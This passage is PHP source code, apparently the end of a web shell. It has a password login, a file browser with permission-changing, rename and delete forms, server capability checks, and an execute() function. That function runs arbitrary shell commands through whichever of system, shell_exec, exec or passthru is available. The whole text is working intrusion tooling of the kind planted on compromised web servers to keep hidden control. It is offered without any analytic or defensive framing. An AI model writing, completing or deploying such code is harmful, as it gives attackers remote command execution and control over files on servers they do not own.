onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td><td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\');">[D]</a></td><tr id="fn">';}}
print '</table></br></br></br>';
}
function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='<font color=red>OFF</font>';}else {$o='<font color=lime>ON</font>';}return($o);}
function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='<font color=red>OFF</font>';}else {$m='<font color=lime>ON</font>';}return($m);}
function curl(){if(extension_loaded('curl')) {$c='<font color=lime>ON</font>';}else {$c='<font color=red>OFF</font>';}return($c);}
function reg_globals(){if(ini_get('reqister_globals')) {$r='<font color=lime>ON</font>';}else {$r='<font color=red>OFF</font>';}return($r);}
function oracle(){if(function_exists('ocilogon')) {$o='<font color=lime>ON</font>';}else {$o='<font color=red>OFF</font>';}return($o);}
function postgresql(){if(function_exists('pg_connect')) {$p='<font color=lime>ON</font>';}else {$p='<font color=red>OFF</font>';}return($p);}
function myql(){if(function_exists('mysql_connect')) {$m='<font color=lime>ON</font>';}else {$m='<font color=red>OFF</font>';}return($m);}
function mssql(){if(function_exists('mssql_connect')) {$m='<font color=lime>ON</font>';}else {$m='<font color=red>OFF</font>';}return($m);}
function gzip(){if(function_exists('gzencode')) {$m='<font color=lime>ON</font>';}else {$m='<font color=red>OFF</font>';}return($m);}
function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);}
function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .='<a href="?d='.$p.'">'.$g.'</a>'.DIRECTORY_SEPARATOR;}return($n);}
function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='red';}return($c);}
function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}}
function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);}
function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'</br>';}} else {print 'dafuq?';}}
function initiate(){print '<table border=0 width=100% height=100% align=center style="background:#202020;color:lime;"><td valign="middle"><center><form action="'.basename(__FILE__).'" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;"></form></center></td></table>';}
function let_him_in() { header("Location: ".basename(__FILE__)); }
print $end;
?>